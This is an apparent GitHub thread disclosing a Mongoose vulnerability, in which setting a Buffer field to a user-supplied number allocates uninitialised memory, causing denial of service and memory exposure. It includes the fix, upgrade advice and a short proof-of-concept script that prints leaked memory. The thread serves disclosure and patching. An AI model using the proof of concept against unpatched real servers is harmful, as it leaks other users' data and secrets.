Don't cast number to buffer by creating a new buffer of size num

[vkarpov15]

Potential DoS vulnerability: send a big number to the server and the server then creates a massive buffer and tries to save it to mongodb.

Example:

var schema = new Schema({ buf: Buffer });
var MyModel = mongoose.model('gh3764', schema);

// 4.3.5 and 3.8.38 treat this as "create a new buffer of size 9001"
// 4.3.6 and 3.8.39 treat this as `new Buffer([9001]);`
var doc = new MyModel({ buf: 9001 });

If you set a buffer to user provided data, a malicious user can easily create arbitrarily large buffers that are not zero-ed out, which can lead to saving code or user data in MongoDB.

This issue was introduced in 3.5.5: 79e740b . Upgrade to >= 3.8.39 or >= 4.3.6 is highly recommended.

[ChALkeR]

Ahem. Just what? I reported this privately for a reason.

[ChALkeR]

Note that this is not just a DoS, it's memory exposure + DoS.
Please read https://github.com/ChALkeR/notes/blob/master/Buffer-knows-everything.md

The prerequisite for this attack is using Buffer schema type as documented on http://mongoosejs.com/docs/schematypes.html and passing typed user content into it.

[vkarpov15]

Thanks for clarifying @ChALkeR

[vkarpov15]

This issue affects mongoose going back to 3.5.5. 79e740b

[robbyoconnor]

Thank you :)

[ChALkeR]

As this is already public and fixed, PoC:

var mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/bufftest');
// data: Buffer is not uncommon, taken straight from the docs: http://mongoosejs.com/docs/schematypes.html
mongoose.model('Item', new mongoose.Schema({id: String, data: Buffer}));
var Item = mongoose.model('Item');
var sample = new Item();
sample.id = 'item1';
sample.data = 1000;
sample.save(function () {
    Item.findOne(function (err, result) {
        console.log(result.data.toString('ascii'))
        mongoose.connection.db.dropDatabase(); // Clean up everything
        process.exit();
    });
});

PoC 2 that shows meaningful data extracted from those Buffers: https://gist.github.com/ChALkeR/440bc3dfcbd9b6da75c3.

[vkarpov15]

Thanks for reporting this @ChALkeR , you're a champ 🍻

[kusold]

@vparkhere Can you please publish a release for this in the 3.8 branch? 3.8.38 is the most recent release and this was merged in after it.

[ChALkeR]

@kusold

Can you please publish a release for this in the 3.8 branch? 3.8.38 is the most recent release and this was merged in after it.

3.8.39 is published both on GitHub and at npm long ago.

[kusold]

My mistake. I was looking at the commits in the 3.8.x branch and didn't see it. It must have been packaged through a side channel. Thank you for correcting me.